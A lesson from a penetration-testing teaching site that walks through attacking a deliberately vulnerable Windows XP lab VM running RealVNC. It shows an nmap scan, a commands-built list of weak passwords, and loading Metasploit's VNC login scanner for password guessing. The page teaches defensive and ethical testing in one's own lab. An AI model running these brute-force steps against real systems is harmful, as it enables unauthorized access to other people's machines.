(Metasploit: Lesson 14)

The CVE number is CVE-1999-0506. The vulnerability is one where a Windows NT domain user or administrator account has a default, null, blank, or missing password, or an easily guessed password.

What is RealVNC?

RealVNC is a company that provides remote access software. The software consists of a server and a client application for the Virtual Network Computing (VNC) protocol, used to control another computer's screen remotely.

The Metasploit Framework is an open-source penetration testing tool used for developing and executing exploit code against a remote target machine; it has the world's largest database of public, tested exploits. In simple terms, Metasploit can be used to test the vulnerability of computer systems in order to protect them, and on the other hand it can also be used to break into remote systems.

What is Damn Vulnerable Windows XP?

This is a Windows XP Virtual Machine that provides a practice environment for conducting ethical penetration testing, vulnerability assessment, exploitation and forensic investigation.

The Microsoft Software License Terms for the IE VMs are included in the release notes.

By downloading and using this software, you agree to these license terms.

As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.

In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."

In addition, this is a teaching website that does not condone malicious behavior of any kind.

You are on notice that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.

You can see that the Operating System Version is Windows XP, running either SP2 or SP3.

Imagine an internet scanner/crawler whose sole purpose was to look for old WXP/W2K3 servers with down-leveled service packs.

Instructions:

nmap -A -T4 192.168.1.116

Section 4: Create Password File

Create Password File

Instructions:

echo "admin" > /var/tmp/passwd.txt

echo "password" >> /var/tmp/passwd.txt

echo "abc123" >> /var/tmp/passwd.txt

cat /var/tmp/passwd.txt

Note(FYI):

(>) is called a redirect operator. In case #1, I am using it to (1) create a file called /var/tmp/passwd.txt and (2) place "admin" on the first line.

(>>) is called an append operator. In cases #2 and #3, the strings "password" and "abc123" are appended to the end of the file.

In case #4, we display the newly created file (/var/tmp/passwd.txt) with the cat command.

Section 5: It's Metasploit Time

Start the Metasploit Framework Console

Instructions:

msfconsole

Set Exploit

Instructions:

use auxiliary/scanner/vnc/vnc_login

Note(FYI):

This module is the VNC Authentication Scanner.

This module will test a VNC server on a range of machines and report successful logins. Currently it supports RFB protocol versions 3.3, 3.7, 3.8 and 4.001 using the VNC challenge-response authentication method.